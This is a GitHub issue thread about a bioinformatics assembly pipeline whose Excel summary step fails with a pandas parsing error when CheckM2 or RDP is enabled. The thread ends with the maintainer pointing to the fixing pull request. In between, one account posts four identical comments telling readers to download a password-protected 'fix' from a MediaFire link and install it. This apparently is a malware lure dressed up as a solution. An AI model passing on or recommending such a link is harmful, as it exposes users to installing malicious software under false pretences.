### ISSUE TITLE
XLSX creation fails with CheckM2 or RDP invoked

### ISSUE THREAD

**Issue by chrisgulvik** [bacterial-genomics/wf-paired-end-illumina-assembly#93]
### Description of the bug

The XLSX fails whenever 1 or both of these are used.

example stdout statement:
`[5d/35ac1a] NOTE: Process `ASSEMBLY:CREATE_EXCEL_RUN_SUMMARY_PYTHON` terminated with an error exit status (1) -- Error is ignored`

The workdir that failed shows pandas trying to merge these files:
```
SRR14718846.CheckM2.report.tsv  Summary.Assemblies.tsv
SRR14718846.RDP.tsv             Summary.Clean_and_Overlapping_Reads.tsv
SRR1556288.CheckM2.report.tsv   Summary.CleanedReads-AlignmentStats.tsv
SRR1556288.RDP.tsv              Summary.CleanedReads-Bases.tsv
SRR4114371.CheckM2.report.tsv   Summary-fastp.Adapter_and_QC_Trimming.tsv
SRR4114371.RDP.tsv              Summary.GenomeCoverage.tsv
SRR4114376.CheckM2.report.tsv   Summary.MLST.tsv
SRR4114376.RDP.tsv              Summary.PhiX_Removal.tsv
SRR554105.CheckM2.report.tsv    Summary.QC_File_Checks.tsv
SRR554105.RDP.tsv               
Summary.16S.tsv
```

so it appears the RDP and CheckM2 never had original Summary.<pkg>.tsv files created prior to this, and therefore pulls in the individual samples for these.

The stderr of the individual pandas cmd is:

```
  File "<stdin>", line 17, in <module>
  File "<stdin>", line 7, in create_summary_workbook
  File "/usr/local/lib/python3.11/site-packages/pandas/io/parsers/readers.py", line 912, in read_csv
    return _read(filepath_or_buffer, kwds)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/site-packages/pandas/io/parsers/readers.py", line 583, in _read
    return parser.read(nrows)
           ^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/site-packages/pandas/io/parsers/readers.py", line 1704, in read
    ) = self._engine.read(  # type: ignore[attr-defined]
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/site-packages/pandas/io/parsers/c_parser_wrapper.py", line 234, in read
    chunks = self._reader.read_low_memory(nrows)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "pandas/_libs/parsers.pyx", line 812, in pandas._libs.parsers.TextReader.read_low_memory
  File "pandas/_libs/parsers.pyx", line 873, in pandas._libs.parsers.TextReader._read_rows
  File "pandas/_libs/parsers.pyx", line 848, in pandas._libs.parsers.TextReader._tokenize_rows
  File "pandas/_libs/parsers.pyx", line 859, in pandas._libs.parsers.TextReader._check_tokenize_status
  File "pandas/_libs/parsers.pyx", line 2025, in pandas._libs.parsers.raise_parser_error
pandas.errors.ParserError: Error tokenizing data. C error: Expected 10 fields in line 5, saw 11
```
and gave exit status 1.

- **RDP:** no "summary" output, instead "rdp_tsv" https://github.com/bacterial-genomics/wf-paired-end-illumina-assembly/blob/main/modules/local/classify_16S_rdp/main.nf#L11
- **CheckM2:** has "summary" output https://github.com/bacterial-genomics/wf-paired-end-illumina-assembly/blob/main/modules/local/assess_assembly_checkm2/main.nf#L13 just as all others that work (e.g., PhiX remove, etc)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by chrisgulvik** [comment]
These two issues were fixed in https://github.com/bacterial-genomics/wf-paired-end-illumina-assembly/pull/94
